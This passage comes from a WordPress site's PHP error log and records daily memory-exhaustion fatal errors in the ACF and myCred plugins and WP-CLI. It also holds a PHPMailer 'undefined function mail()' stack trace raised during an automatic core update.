10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [23-Jun-2026 21:40:42 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 514 [23-Jun-2026 21:40:42 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [23-Jun-2026 21:40:48 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/shortcode/mycred-single-badge.php on line 17 [23-Jun-2026 21:40:48 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [24-Jun-2026 21:40:43 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 514 [24-Jun-2026 21:40:43 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [24-Jun-2026 21:40:49 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/shortcode/mycred-single-badge.php on line 17 [24-Jun-2026 21:40:49 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [25-Jun-2026 21:40:44 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 514 [25-Jun-2026 21:40:44 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [25-Jun-2026 21:40:51 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/shortcode/mycred-single-badge.php on line 17 [25-Jun-2026 21:40:51 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [26-Jun-2026 21:40:51 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 543 [26-Jun-2026 21:40:51 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [26-Jun-2026 21:40:59 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/shortcode/mycred-single-badge.php on line 17 [26-Jun-2026 21:40:59 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [27-Jun-2026 21:40:52 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 543 [27-Jun-2026 21:40:52 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [27-Jun-2026 21:41:00 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/shortcode/mycred-single-badge.php on line 17 [27-Jun-2026 21:41:00 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [28-Jun-2026 21:40:53 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 514 [28-Jun-2026 21:40:53 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [28-Jun-2026 21:41:00 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/shortcode/mycred-single-badge.php on line 17 [28-Jun-2026 21:41:00 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [29-Jun-2026 21:40:55 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 514 [29-Jun-2026 21:40:55 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [29-Jun-2026 21:41:03 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/shortcode/mycred-single-badge.php on line 17 [29-Jun-2026 21:41:03 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [30-Jun-2026 21:40:56 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 514 [30-Jun-2026 21:40:56 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [30-Jun-2026 21:41:03 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/shortcode/mycred-single-badge.php on line 17 [30-Jun-2026 21:41:03 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [01-Jul-2026 21:40:11 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 514 [01-Jul-2026 21:40:11 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [01-Jul-2026 21:40:18 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/shortcode/mycred-single-badge.php on line 17 [01-Jul-2026 21:40:18 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [02-Jul-2026 21:40:13 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 514 [02-Jul-2026 21:40:13 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [02-Jul-2026 21:40:21 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/shortcode/mycred-single-badge.php on line 17 [02-Jul-2026 21:40:21 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [03-Jul-2026 21:40:14 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 543 [03-Jul-2026 21:40:14 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [03-Jul-2026 21:40:22 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/shortcode/mycred-single-badge.php on line 17 [03-Jul-2026 21:40:22 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [05-Jul-2026 21:40:20 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 543 [05-Jul-2026 21:40:20 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [05-Jul-2026 21:40:28 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/shortcode/mycred-single-badge.php on line 17 [05-Jul-2026 21:40:28 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [06-Jul-2026 21:40:18 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 514 [06-Jul-2026 21:40:18 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [06-Jul-2026 21:40:25 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/shortcode/mycred-single-badge.php on line 17 [06-Jul-2026 21:40:25 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [07-Jul-2026 21:40:20 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 514 [07-Jul-2026 21:40:20 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [07-Jul-2026 21:40:27 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/shortcode/mycred-single-badge.php on line 17 [07-Jul-2026 21:40:27 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [08-Jul-2026 21:40:21 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 515 [08-Jul-2026 21:40:21 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [08-Jul-2026 21:40:28 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/shortcode/mycred-single-badge.php on line 17 [08-Jul-2026 21:40:28 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [09-Jul-2026 21:40:23 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 514 [09-Jul-2026 21:40:23 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [09-Jul-2026 21:40:30 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/shortcode/mycred-single-badge.php on line 17 [09-Jul-2026 21:40:30 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [09-Jul-2026 21:55:04 UTC] PHP Fatal error: Uncaught Error: Call to undefined function PHPMailer\PHPMailer\mail() in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/PHPMailer/PHPMailer.php:893 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/PHPMailer/PHPMailer.php(2139): PHPMailer\PHPMailer\PHPMailer->mailPassthru() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/PHPMailer/PHPMailer.php(1853): PHPMailer\PHPMailer\PHPMailer->mailSend() #2 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/PHPMailer/PHPMailer.php(1668): PHPMailer\PHPMailer\PHPMailer->postSend() #3 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/pluggable.php(628): PHPMailer\PHPMailer\PHPMailer->send() #4 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-admin/includes/class-wp-automatic-updater.php(1149): wp_mail() #5 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-admin/includes/class-wp-automatic-updater.php(804): WP_Automatic_Updater->send_email() #6 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-admin/includes/class-wp-automatic-updater.php(771): WP_Automatic_Updater->after_core_update() #7 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/update.php(890): WP_Automatic_Updater->run() #8 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): wp_maybe_auto_update() #9 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #10 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(522): WP_Hook->do_action() #11 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/update.php(337): do_action() #12 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(341): wp_version_check() #13 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/class-wp-hook.php(365): WP_Hook->apply_filters() #14 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/plugin.php(570): WP_Hook->do_action() #15 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-cron.php(191): do_action_ref_array() #16 {main} thrown in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/PHPMailer/PHPMailer.php on line 893 [10-Jul-2026 21:40:25 UTC] PHP Fatal error: WpOrg\Requests\Hooks::register(): Cannot use output buffering in output buffering display handlers in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 508 [10-Jul-2026 21:40:33 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/requirements/mycred-badge-earned-points-amount-requirement.php on line 29 [10-Jul-2026 21:40:33 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [11-Jul-2026 21:40:25 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 508 [11-Jul-2026 21:40:25 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [11-Jul-2026 21:40:32 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/requirements/mycred-badge-earned-points-amount-requirement.php on line 29 [11-Jul-2026 21:40:32 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [12-Jul-2026 21:40:26 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 508 [12-Jul-2026 21:40:26 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [12-Jul-2026 21:40:33 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/requirements/mycred-badge-earned-points-amount-requirement.php on line 29 [12-Jul-2026 21:40:33 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [13-Jul-2026 21:40:27 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 508 [13-Jul-2026 21:40:27 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [13-Jul-2026 21:40:34 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/requirements/mycred-badge-earned-points-amount-requirement.php on line 29 [13-Jul-2026 21:40:34 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [14-Jul-2026 21:40:26 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 536 [14-Jul-2026 21:40:26 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [14-Jul-2026 21:40:33 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/requirements/mycred-badge-earned-points-amount-requirement.php on line 29 [14-Jul-2026 21:40:33 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [15-Jul-2026 21:40:28 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 508 [15-Jul-2026 21:40:28 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [15-Jul-2026 21:40:34 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/requirements/mycred-badge-earned-points-amount-requirement.php on line 29 [15-Jul-2026 21:40:34 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [16-Jul-2026 21:40:13 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 536 [16-Jul-2026 21:40:13 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [16-Jul-2026 21:40:20 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/requirements/mycred-badge-earned-points-amount-requirement.php on line 29 [16-Jul-2026 21:40:20 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [17-Jul-2026 21:40:14 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-icon_picker.php on line 511 [17-Jul-2026 21:40:14 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [17-Jul-2026 21:40:21 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/plugins/mycred/addons/badge-plus/includes/blocks/badge-plus-blocks.php on line 60 [17-Jul-2026 21:40:21 UTC] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 10485760 bytes) in /usr/local/cpanel/3rdparty/wp-toolkit/plib/vendor/wp-cli/vendor/wp-cli/php-cli-tools/lib/cli/Colors.php on line 21 [17-Jul-2026 21:53:31 UTC] PHP Fatal error: Uncaught Error: Call to undefined function PHPMailer\PHPMailer\mail() in /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/PHPMailer/PHPMailer.php:893 Stack trace: #0 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/PHPMailer/PHPMailer.php(2139): PHPMailer\PHPMailer\PHPMailer->mailPassthru() #1 /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-includes/PHPMailer/PHPMailer.php(1853): PHPMailer\PHPMailer\PHPMailer->mailSend() #2 